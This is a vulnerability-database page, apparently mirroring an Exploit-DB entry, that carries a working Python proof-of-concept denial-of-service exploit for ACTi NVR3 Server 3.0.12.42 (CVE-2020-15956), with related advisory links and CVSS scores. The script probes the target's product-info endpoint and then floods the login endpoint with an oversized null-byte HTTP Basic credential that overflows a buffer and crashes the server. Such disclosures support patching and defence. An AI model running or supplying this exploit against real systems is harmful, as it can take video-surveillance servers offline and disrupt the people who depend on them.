Lucene search
K

ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)

🗓️ 05 Aug 2020 00:00:00Reported by MegaMagnusType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 178 Views

ACTi NVR3 Server Denial of Service (PoC

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Classic Buffer Overflow in Acti Nvr
4 Aug 202003:27
githubexploit
0day.today
ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service Exploit
5 Aug 202000:00
zdt
CNVD
ACTi NVR3 Standard Server Buffer Overflow Vulnerability
7 Aug 202000:00
cnvd
CVE
CVE-2020-15956
4 Aug 202019:03
cve
Cvelist
CVE-2020-15956
4 Aug 202019:03
cvelist
NVD
CVE-2020-15956
4 Aug 202020:15
nvd
OSV
CVE-2020-15956
4 Aug 202020:15
osv
Packet Storm
ACTi NVR3 Standard / Professional Server 3.0.12.42 Denial Of Service
6 Aug 202000:00
packetstorm
Prion
Buffer overflow
4 Aug 202020:15
prion
# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)  #
# Date: 2020-08-04                                                              #
# Exploit Author: MegaMagnus                                                    #
# Vendor Homepage: https://www.acti.com/                                        #
# Software Link: https://www.acti.com/DownloadCenter                            #
# Version: V.3.0.12.42 , V.2.3.04.07                                            #
# Tested on: Windows 7, Windows 10                                              #
# CVE: CVE-2020-15956                                                           #
# This is a Proof of Concept Exploit, Please use responsibly.                   #
#################################################################################

#!/usr/bin/env python
import requests
from requests.auth import HTTPBasicAuth
import sys

def product_info(server):
    try:
        r = requests.get(sys.argv[1] + '/media/Product/getProductInfo', timeout=10)
        if r.status_code == 200:
            print(r.text)
            return True
    except Exception as e:
        print(e)
    return False

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: cve-2020-15956.py <target>")
        exit(-1)
    if product_info(sys.argv[1]):
        print("Starting DOS. Use Ctrl-C (SIGINT) to stop!")
        while True:
            try:
                payload = b"\x00" * (760)
                r = requests.get(sys.argv[1] + '/Media/UserGroup/login', auth=HTTPBasicAuth('Basic',payload), timeout=10)
                print(r.status_code)
            except KeyboardInterrupt:
                pass
            except Exception as e:
                pass

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.4652
178